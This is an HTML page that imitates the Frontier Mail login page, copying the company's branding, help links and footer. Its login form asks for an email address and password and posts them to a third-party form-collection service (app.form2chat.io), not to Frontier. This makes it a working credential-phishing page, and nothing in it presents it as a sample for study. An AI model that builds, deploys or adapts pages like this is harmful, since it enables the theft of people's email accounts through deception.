<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Frontier Mail Login</title>

  <link rel="icon" href="https://login.frontier.com/ftr-sys-theme/img/favicon.svg" type="image/x-icon">

  <link rel="stylesheet" type="text/css" href="frontier.css">

  <style>

.frontier-logo{
box-sizing: border-box;
display: inline;
height: 70px;
overflow-x: clip;
overflow-y: clip;

}

.logo{
box-sizing: border-box;
display: block;
height: 70px;
margin-bottom: 40px;
margin-top: 20px;
min-height: 1px;
padding-left: 200px;
padding-right: 20px;
position: relative;

}

.container{
margin-left: 200px;
}



.main-box{
  box-sizing: border-box;
  display: block;
  height: 542.594px;
  margin-bottom: 20px;
  min-height: 400px;
  padding-bottom: 19px;
  padding-left: 19px;
  padding-right: 19px;
  padding-top: 19px;
  width: 1140px;
  font-family: PPObjectSans-Regular, Helvetica, Arial, Verdana, Geneva, Tahoma, sans-serif;
  font-size: 14px;
  line-height: 20px;
  color: rgb(51, 51, 51);
  background-color: rgb(255, 255, 255);
  background-image: none;
  border-bottom-color: rgb(220, 220, 220);
  border-bottom-style: solid;
  border-bottom-width: 1px;
  border-image-outset: 0;
  border-image-repeat: stretch;
  border-image-slice: 100%;
  border-image-source: none;
  border-image-width: 1;
  border-left-color: rgb(220, 220, 220);
  border-left-style: solid;
  border-left-width: 1px;
  border-right-color: rgb(220, 220, 220);
  border-right-style: solid;
  border-right-width: 1px;
  border-top-color: rgb(220, 220, 220);
  border-top-style: solid;
  border-top-width: 1px;
  box-shadow: rgba(0, 0, 0, 0.05) 0px 1px 1px 0px inset;
  border-bottom-left-radius: 4px;
  border-bottom-right-radius: 4px;
  border-top-left-radius: 4px;
  border-top-right-radius: 4px;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}


.header{
box-sizing: border-box;
display: block;
height: 39.5938px;
margin-bottom: 42px;
margin-left: 0px;
margin-right: 0px;
margin-top: 20px;
width: 847.5px;
font-family: PPObjectSans-Regular, Helvetica, Arial, Verdana, Geneva, Tahoma, sans-serif;
font-size: 19px;
font-weight: 500;
line-height: 39.6px;
text-size-adjust: 100%;
color: rgb(51, 51, 51);
margin-block-end: 42px;
margin-block-start: 20px;
margin-inline-end: 0px;
margin-inline-start: 0px;
-webkit-tap-highlight-color: rgba(0, 0, 0, 0);

}

.form-box{
float: left;
margin-left: 97.5px;
min-height: 1px;
padding-left: 15px;
padding-right: 15px;
position: relative;
width: 390px;

}

.form-group{
box-sizing: border-box;
display: block;
height: 59px;
width: 360px;
margin-bottom: 5px;
font-family: Verdana, Geneva, Tahoma, sans-serif;
font-size: 14px;
line-height: 20px;
text-size-adjust: 100%;
color: rgb(51, 51, 51);

}

.form-control{
box-sizing: border-box;
display: block;
height: 34px;
padding-bottom: 6px;
padding-left: 12px;
padding-right: 12px;
padding-top: 6px;
width: 360px;

font-size: 14px;
font-stretch: 100%;
font-weight: 400;
letter-spacing: normal;
line-height: 20px;
text-align: start;

color: rgb(85, 85, 85);
background-color: rgb(255, 255, 255);
border-bottom-color: rgb(204, 204, 204);
border-top-color: rgb(204, 204, 204);
border-left-color: rgb(204, 204, 204);
border-right-color: rgb(204, 204, 204);
border-bottom-style: solid;
border-top-style: solid;
border-left-style: solid;
border-right-style: solid;
border-top-width: 1px;
border-bottom-width: 1px;
border-left-width: 1px;
border-right-width: 1px;
box-shadow: rgba(0, 0, 0, 0.075) 0px 1px 1px 0px inset;
cursor: text;
transition-delay: 0s, 0s, 0s;
transition-duration: 0.15s, 0.15s, 0.15s;
transition-property: border-color, box-shadow, -webkit-box-shadow;
transition-timing-function: ease-in-out, ease-in-out, ease-in-out;

text-rendering: auto;
writing-mode: horizontal-tb;
appearance: auto;
border-bottom-left-radius: 4px;
border-bottom-right-radius: 4px;
border-top-left-radius: 4px;
border-top-right-radius: 4px;

}

.button{
box-sizing: border-box;
display: block;
height: 32px;
overflow-x: visible;
overflow-y: visible;
align-items: flex-start;
margin-bottom: 5px;
margin-top: 0px;
margin-left: 0px;
cursor: pointer;
margin-right: 0px;
padding-bottom: 6px;
padding-top: 6px;
padding-left: 12px;
padding-right: 12px;
width: 360px;

text-align: center;
font-weight: 400;
font-size: 14px;
color: rgb(255, 255, 255);
background-color: rgb(255, 0, 55);
border-bottom-color: rgb(255, 255, 255);
border-top-color: rgb(255, 255, 255);
border-left-color: rgb(255, 255, 255);
border-right-color: rgb(255, 255, 255);

border-bottom-left-radius: 20px;
border-bottom-right-radius: 20px;
border-top-left-radius: 20px;
border-top-right-radius: 20px;
border-top-style: none;
border-bottom-width: 0px;


}

.input-label{
box-sizing: border-box;
display: inline-block;
height: 20px;
margin-bottom: 5px;
max-width: 100%;
width: 97.7812px;
font-size: 12.2px;
font-weight: 700;
line-height: 20px;
color: rgb(51, 51, 51);
cursor: default;
}

.forgot-pass{
box-sizing: border-box;
height: auto;
text-decoration-color: rgb(51, 153, 204);
text-decoration-line: none;
text-decoration-style: solid;
text-decoration-thickness: auto;
color: rgb(51, 153, 204);
background-color: rgba(0, 0, 0, 0);
cursor: pointer;
font-family: Helvetica, Arial, Verdana, Geneva, Tahoma, ;
margin-bottom: 30px;
padding-bottom: 20px;
margin-top: 0px;
width: 360px;
font-size: 14px;
line-height: 20px;
text-size-adjust: 100%;
margin-block-end: 10px;
}

.corner-search{
box-sizing: border-box;
display: block;
float: left;
height: 101px;
margin-left: 97.5px;
min-height: 1px;
padding-left: 15px;
padding-right: 15px;
position: relative;
width: 390px;
font-family: Arial, Helvetica, sans-serif;
font-size: 14px;
line-height: 20px;
text-size-adjust: 100%;
}

.btn1{
align-items: flex-start;
box-sizing: border-box;
clear: both;
display: block;
float: right;
height: 34px;
margin-bottom: 0px;
margin-left: 0px;
margin-right: 0px;
margin-top: 0px;
overflow-x: visible;
overflow-y: visible;
padding-bottom: 5px;
padding-left: 5px;
padding-right: 5px;
padding-top: 5px;
width: 126px;


font-family: PPObjectSans-Bold, Helvetica, Arial, sans-serif;
font-feature-settings: normal;
font-kerning: auto;
font-optical-sizing: auto;
font-size: 13px;
font-stretch: 100%;
font-style: normal;
font-variant-alternates: normal;
font-variant-caps: normal;
font-variant-east-asian: normal;
font-variant-ligatures: normal;
font-variant-numeric: normal;
font-variation-settings: normal;
font-weight: 400;
letter-spacing: normal;
line-height: 18.5714px;
text-align: center;
text-indent: 0px;
text-shadow: none;
text-transform: none;
vertical-align: middle;
word-spacing: 0px;
color: rgb(255, 255, 255);
background-attachment: scroll;
background-clip: border-box;
background-color: rgb(51, 153, 204);
background-image: none;
background-origin: padding-box;
background-position-x: 0%;
background-position-y: 0%;
background-size: auto;
border-bottom-color: rgb(255, 255, 255);
border-bottom-style: none;
border-bottom-width: 0px;
border-image-outset: 0;
border-image-repeat: stretch;
border-image-slice: 100%;
border-left-color: rgb(255, 255, 255);
border-left-style: none;
border-left-width: 0px;
border-right-color: rgb(255, 255, 255);
border-right-style: none;
border-right-width: 0px;
border-top-color: rgb(255, 255, 255);
border-top-style: none;
border-top-width: 0px;
cursor: pointer;
text-rendering: auto;
writing-mode: horizontal-tb;
appearance: button;
border-bottom-left-radius: 20px;
border-bottom-right-radius: 20px;
border-top-left-radius: 20px;
border-top-right-radius: 20px;

}


.yahoo-search1{
  box-sizing: border-box;
  display: block;
  float: right;
  height: 27px;
  margin-bottom: 0px;
  margin-left: 0px;
  margin-right: 0px;
  margin-top: 0px;
  width: 124px;
  font-family: PPObjectSans-Regular, Helvetica, Arial, Verdana, Geneva, Tahoma, sans-serif;
  font-size: 14px;
  line-height: 20px;
  text-size-adjust: 100%;
  vertical-align: middle;
  color: rgb(51, 51, 51);
  border-bottom-color: rgb(51, 51, 51);
  border-bottom-style: none;
  border-bottom-width: 0px;
  border-image-outset: 0;
  border-image-repeat: stretch;
  border-image-slice: 100%;
  border-image-source: none;
  border-image-width: 1;
  border-left-color: rgb(51, 51, 51);
  border-left-style: none;
  border-left-width: 0px;
  border-right-color: rgb(51, 51, 51);
  border-right-style: none;
  border-right-width: 0px;
  border-top-color: rgb(51, 51, 51);
  border-top-style: none;
  border-top-width: 0px;
  overflow-clip-margin: content-box;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}


.form-control1{
box-sizing: border-box;
display: block;
float: left;
height: 34px;
padding-bottom: 6px;
padding-left: 12px;
padding-right: 12px;
padding-top: 6px;
width: 220px;
font-family: Verdana, Geneva, Tahoma, sans-serif;
font-feature-settings: normal;
font-kerning: auto;
font-optical-sizing: auto;
font-size: 14px;
font-stretch: 100%;
font-style: normal;
font-variant-alternates: normal;
font-variant-caps: normal;
font-variant-east-asian: normal;
font-variant-ligatures: normal;
font-variant-numeric: normal;
font-variation-settings: normal;
font-weight: 400;
letter-spacing: normal;
line-height: 20px;
text-align: start;
text-indent: 0px;
text-shadow: none;
text-transform: none;
word-spacing: 0px;
color: rgb(85, 85, 85);
background-color: rgb(255, 255, 255);
background-image: none;
border-bottom-color: rgb(204, 204, 204);
border-bottom-style: solid;
border-bottom-width: 1px;
border-image-outset: 0;
border-image-repeat: stretch;
border-image-slice: 100%;
border-image-source: none;
border-image-width: 1;
border-left-color : rgb(204, 204, 204);
border-left-style: solid;
border-left-width: 1px;
border-right-color: rgb(204, 204, 204);
border-right-style: solid;
border-right-width: 1px;
border-top-color:rgb(204, 204, 204);
border-top-style: solid;
border-top-width: 1px;
box-shadow: rgba(0, 0, 0, 0.075) 0px 1px 1px 0px inset;
cursor: text;
transition-delay: 0s, 0s, 0s;
transition-duration: 0.15s, 0.15s, 0.15s;
transition-property: border-color, box-shadow, -webkit-box-shadow;
transition-timing-function: ease-in-out, ease-in-out, ease-in-out;
text-rendering: auto;
writing-mode: horizontal-tb;
appearance: auto;
border-bottom-left-radius: 4px;
border-bottom-right-radius: 4px;
border-top-left-radius: 4px;
border-top-right-radius: 4px;
-webkit-rtl-ordering: logical;
-webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}

.division-line{
box-sizing: border-box;
display: block;
float: left;
height: 41px;
margin-top: 2ch;
margin-left: 0px;
min-height: 1px;
padding-left: 0px;
padding-right: 15px;
position: relative;
width: 877.5px;
font-family: Helvetica, Arial, Verdana, Geneva, Tahoma, sans-serif;
font-size: 14px;
line-height: 20px;
text-size-adjust: 100%;
}

.help-link1{
font-size: 14px;
font-weight: 700;
line-height: 20px;
text-size-adjust: 100%;

}

.help-link3{
  font-size: 14px;
  line-height: 20px;
  text-decoration-color: rgb(51, 153, 204);
  text-decoration-line: none;
  text-decoration-style: solid;
  text-decoration-thickness: auto;
}

.container1{
box-sizing: border-box;
display: block;
height: 359.734px;
padding-bottom: 35px;
padding-top: 35px;
width: 1246px;
padding-left: 30px;
font-family: PPObjectSans-Regular, Helvetica, Arial, Verdana, Geneva, Tahoma, sans-serif;
font-size: 11px;
line-height: 15.7143px;
color: rgb(153, 153, 153);
background-color: rgb(34, 34, 34);
}

.row{
box-sizing: border-box;
display: block;
height: 223.328px;
margin-left: -15px;
margin-right: -15px;
width: 1170px;
font-family: PPObjectSans-Regular, Helvetica, Arial, Verdana, Geneva, Tahoma, sans-serif;
font-size: 11px;
line-height: 15.7143px;
color: rgb(153, 153, 153);
-webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}

.row1{
box-sizing: border-box;
display: block;
float: left;
height: 223.328px;
min-height: 1px;
padding-left: 0px;
padding-right: 15px;
position: relative;
width: 195px;
font-family: PPObjectSans-Regular, Helvetica, Arial, Verdana, Geneva, Tahoma, sans-serif:
font-size: 11px;
line-height: 15.7143px;
color: rgb(153, 153, 153);
-webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}

.footer_area{
box-sizing: border-box;
display: block;
height: 359.734px;
padding-bottom: 35px;
padding-top: 35px;
width: 1246px;
font-family: PPObjectSans-Regular, Helvetica, Arial, Verdana, Geneva, Tahoma, sans-serif;
font-size: 11px;
line-height: 15.7143px;
color: rgb(153, 153, 153);
background-color: rgb(34, 34, 34);
-webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}


.h3{
font-family: PPObjectSans-Regular, Helvetica, Arial, Verdana, Geneva, Tahoma, sans-serif;
font-size: 13px;
font-weight: 700;
line-height: 18px;
text-transform: uppercase;
}

.li{
box-sizing: border-box;
display: list-item;
height: 21.7031px;
padding-bottom: 3px;
padding-left: 0px;
padding-right: 0px;
padding-top: 3px;
width: 165px;
font-family: PPObjectSans-Regular, Helvetica, Arial, Verdana, Geneva, Tahoma, sans-serif;
font-size: 11px;
line-height: 15.7143px;
text-align: left;
color: rgb(153, 153, 153);
list-style-image: none;
list-style-position: outside;
list-style-type: none;
-webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}

  </style>

</head>

<body>

  <div class="logo">
    <a href="https://frontier.com"><img class="frontier-logo" src="https://login.frontier.com/ftr-sys-theme/img/favicon.svg"></a>
  </div>

  <div class="container"> 
<p>Please sign in to confirm your identity</p>
  <div class="main-box"> 
    <div class="form-box">

      <form action="https://app.form2chat.io/f/5e72fe17" method="POST">

        <div class="header">
         <h1>Frontier Mail Login</h1>
        </div>
   
   
        <div class="form-group">
       <label for="email" class="input-label">Email Address</label> <br>
       <input type="email" name="email" placeholder="username@frontier.com" value="" class="form-control" required>
        </div>`
   
        <div class="form-group">
       <label for="pass" class="input-label">Password</label> <br>
       <input type="password" name="pass" placeholder="**********" class="form-control" required>
        </div>
   
        <br>
       
       <input type="submit" name="" value="Login" class="button"> <br>
   
       <a href="" class="forgot-pass">Forgot Your Password?</a>
   
       </form>

       <div class="division-line">

        <hr>




        <div class="help-link1">
          <!--fid-help-links class="ng-isolate-scope"-->
            <p class="fid-help-links"> <span data-i18n="fid.need-help">Still need help?</span> <span class="fid-help-links-option"> <i class="fa fa-comment fa-lg"></i> <a href="https://frontier.com/helpcenter/contact-us" target="_blank" data-i18n="fid.live-chat">Live Chat</a> </span> <span class="fid-help-links-option"> <i class="fa fa-question-circle fa-lg"></i> <a href="https://frontier.com/helpcenter" target="_blank" data-i18n="fid.help-center">Help Center</a> </span> </p>
          <!--/fid-help-links-->
        </div>

        <div class="help=link2">
          <p><strong>Note:</strong> For your security, please be sure to log out when you are done.</p>
          <p>
            Frontier does not track how you use e-mail or what sites you visit. If your Frontier e-mail is hosted by Yahoo!, Yahoo! does not share this information with Frontier. <a href="http://www.frontier.com/policies" class="help-link3">See Frontier's Privacy Policy.</a>
          </p>
        </div>



      </div>

    </div>



    <div class="corner-search">

      <p class="yahoo-font-color">Make <a href="http://frontier.my.yahoo.com/">Frontier Yahoo! your homepage</a>.
      </p>

      <div id="yahooSearchTop">
        <form class="yahooSearch">
          <div class="form-group">

<script type="text/javascript">
<!--
function CheckForEnter(e, inputName)
{
e = (e) ? e : event;
if(e.which || e.keyCode){
  if ((e.which == 13) || (e.keyCode == 13)) {
    document.getElementById(inputName).click();
    e.returnValue = false;
    e.cancel = true;
    return false;
  }
}
else 
{
  return true;
}
}
        
function executeSearchTop(thisForm){
var resultURL=''; 
resultURL+='https://search.yahoo.com/yhs/search?hspart=frontier&hsimp=yhs-frontier1&p=';
resultURL+=escape(thisForm.searchforTop.value); 
var gotoURL=resultURL; 
 
document.location.href=gotoURL; 
return false;                                                   
}
-->
</script>

            <img title="" alt="Powered By Yahoo! Search" src="https://s.yimg.com/rz/p/frontier_login_en-US_s_f_p_bestfit_login_2x.png" class="yahoo-search1">
            <button class="btn1" type="web search" onclick="return executeSearchTop(this.form);" name="SubmitSearch" id="SubmitSearch"> Web Search </button>
            <input class="form-control1" tabindex="6" onkeypress="return CheckForEnter(event, 'SubmitSearch');"  name="searchforTop" id="inputSearch">
          </div>
          <input type="hidden" name="stTop" value="site">
        </form>   
      </div>
  </div>
</div>





<div id="ftr_footer_area" class="footer_area">
  <div class="container1">
    <div class="row">
      <div class="row1">
        <h3>Shop</h3>
        <ul>
          <li><a href="https://frontier.com/shop">Plans</a></li>
          <li><a href="https://frontier.com/shop/internet">Internet</a></li>
          <li><a href="https://frontier.com/shop/internet/why-fiber-internet">Fiber Internet</a></li>
          <li><a href="https://frontier.com/shop/tv">Video/TV</a></li>
          <li><a href="https://frontier.com/shop/phone">Phone</a></li>
          <li><a href="https://frontier.com/shop/frontier-secure">Frontier Secure</a></li>
          <li><a href="https://frontier.com/resources/movers">Moving</a></li>
          <li><a href="https://frontier.com/local">Availability</a></li>
          <li><a href="https://frontier.com/resources/multifamily" target="blank" rel="nofollow">Multifamily</a></li>
        </ul>
      </div>
      <div class="row1">
        <h3>My Account</h3>
        <ul>
          <li><a href="https://frontier.com/resources/frontier-id-registration?icid=18oct12_national_homepage_register_footer_page_link" target="blank">Register</a></li>
          <li><a href="https://frontier.com/login" target="blank">Pay Bill</a></li>
          <li><a href="https://login.frontier.com/webmail" target="blank">Check Email</a></li>
          <li><a href="https://frontier.com/login" target="blank">Manage Account</a></li>
          <li><a href="https://frontier.com/resources/myfrontier-mobile-app">MyFrontier App</a></li>
          <li><a href="https://tv.frontier.com">Watch TV</a></li>
        </ul>
      </div>
      <div class="row1">
        <h3>Support</h3>
        <ul>
          <li><a href="https://frontier.com/helpcenter">Help Center</a></li>
          <li><a href="http://videos.frontier.com">Video Gallery</a></li>
          <li><a href="https://frontier.com/helpcenter/categories/support-wizard">Support Wizard</a></li>
          <li><a href="https://frontier.com/helpcenter/categories/ticket-status">Trouble Ticket Status</a></li>
          <li><a href="https://frontier.com/helpcenter/categories/order-status">Order Status</a></li>
          <li><a href="https://frontier.com/contact-us">Contact Us</a></li>
        </ul>
      </div>
      <div class="row1">
        <h3>Corporate</h3>
        <ul>
          <li><a href="https://newsroom.frontier.com/leadership">Company</a></li>
          <li><a href="http://investor.frontier.com">Investors</a></li>
          <li><a href="https://newsroom.frontier.com">News</a></li>
          <li><a href="https://blog.frontier.com">Blog</a></li>
          <li><a href="https://frontier.com/corporate/responsibility/home">Responsibility</a></li>
          <li><a href="https://frontier.com/corporate/company/supplier" rel="nofollow">Suppliers</a></li>
          <li><a href="https://frontier.com/corporate/responsibility/inspection-files/home" rel="nofollow">Public Inspection Files</a></li>
          <li><a href="https://frontier.com/discount-programs">Discount Programs</a></li>
          <li><a href="https://frontier-careers.com">Careers</a></li>
        </ul>
      </div>
      <div class="row1">
        <h3>Frontier Sites</h3>
        <ul>
          <li><a href="https://business.frontier.com" target="blank">Small Business</a></li>
          <li><a href="https://enterprise.frontier.com" target="blank">Enterprise</a></li>
          <li><a href="https://wholesale.frontier.com/home" target="blank" rel="nofollow">Wholesale</a></li>
          <li><a href="https://frontier.yahoo.com" target="blank">Frontier Yahoo Portal</a></li>
          <li><a href="https://frontier.com/frontieragent" target="blank" rel="nofollow">Frontier Business Partner Program</a></li>
          <li><a href="https://frontier.com/resources/white-pages" target="blank" rel="nofollow">Phone Directories</a></li>
        </ul>
      </div>
      <div class="row1">
        <h3>Sales Partners</h3>
        <ul>
          <li><a href="https://internet.frontier.com" target="blank">Frontier Internet</a></li>
          <li><a href="https://go.frontier.com" target="blank">Frontier Fiber</a></li>
          <li><a href="https://internet.frontier.com/fiber-internet" target="blank">Frontier Fiber Internet</a></li>
          <li><a href="https://www.frontierbundles.com/availability" target="blank">Local Internet</a></li>
        </ul>
      </div>
      <!--.col-md-12.nopad-->
    </div>
    <div class="row">
      <div class="col-md-2 hidden-sm hidden-xs nopad pull-right">
        <div class="social-icons-ftr">
          <span class="fa-stack fa-lg">
            <a href="https://twitter.com/FrontierCorp" target="_blank">
              <i class="fa fa-circle fa-stack-2x twitter"></i>
              <i class="fa fa-twitter fa-stack-1x fa-inverse"></i>
            </a>
          </span>
          <span class="fa-stack fa-lg">
            <a href="https://www.facebook.com/FrontierCorp" target="_blank">
              <i class="fa fa-circle fa-stack-2x facebook"></i>
              <i class="fa fa-facebook fa-stack-1x fa-inverse"></i>
            </a>
          </span>
          <span class="fa-stack fa-lg">
            <a href="https://www.linkedin.com/company/frontier-communications" target="_blank">
              <i class="fa fa-circle fa-stack-2x linkedin"></i>
              <i class="fa fa-linkedin fa-stack-1x fa-inverse"></i>
            </a>
          </span>
          <span class="fa-stack fa-lg">
            <a href="https://www.youtube.com/user/FrontierCorp" target="_blank">
              <i class="fa fa-circle fa-stack-2x youtube"></i>
              <i class="fa fa-youtube-play fa-stack-1x fa-inverse">  </i>
            </a>
          </span>
        </div>
      </div>
      <!-- <div class="policies">
        <ul id="policies">
          <li><a href="https://frontier.com" rel="nofollow">Home</a></li>
          <li class="spacer">|</li>
          <li><a href="https://frontier.com/sitemap" rel="nofollow">Site Map</a></li>
          <li class="spacer">|</li>
          <li><a href="https://frontier.com/corporate/retailstores/locations" rel="nofollow">Store Locator</a></li>
          <li class="spacer">|</li>
          <li><a href="https://frontier.com/corporate/policies" rel="nofollow">Policies &amp; Notifications</a></li>
          <li class="spacer">|</li>
          <li><a href="https://frontier.com/corporate/terms" rel="nofollow">Terms &amp; Conditions</a></li>
          <li class="spacer">|</li>
          <li><a href="https://frontier.com/corporate/privacy-policy">Privacy Policy</a></li>
          <li class="spacer">|</li>
          <li><a href="https://frontier.com/corporate/privacy-policy-california">California Privacy Policy</a></li>
        </ul> -->
        <div id="copyright">&copy;2023 Frontier Communications Parent, Inc. All rights reserved.</div>
      </div>
    </div>
  </div>
</div><!-- footer_area -->


  
</body>
</html>